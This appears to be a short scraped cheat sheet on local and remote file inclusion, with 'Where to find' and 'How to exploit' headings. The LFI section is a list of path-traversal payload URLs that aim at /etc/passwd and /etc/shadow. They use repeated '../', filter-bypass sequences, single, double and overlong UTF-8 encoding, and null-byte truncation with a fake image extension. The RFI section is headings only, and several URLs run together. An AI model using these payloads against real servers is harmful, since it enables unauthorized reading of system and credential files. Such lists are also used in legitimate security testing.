LFI & RFI
LFI
Where to find
How to exploit
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../../../../../../../../../../etc/shadow
http://example.com/index.php?page=..././..././..././..././..././etc/shadowhttp://example.com/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdhttp://example.com/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswdhttp://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwdhttp://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=../../../etc/passwd%00.png #any (jpg...etc) RFI
Where to find
How to exploit
Last updated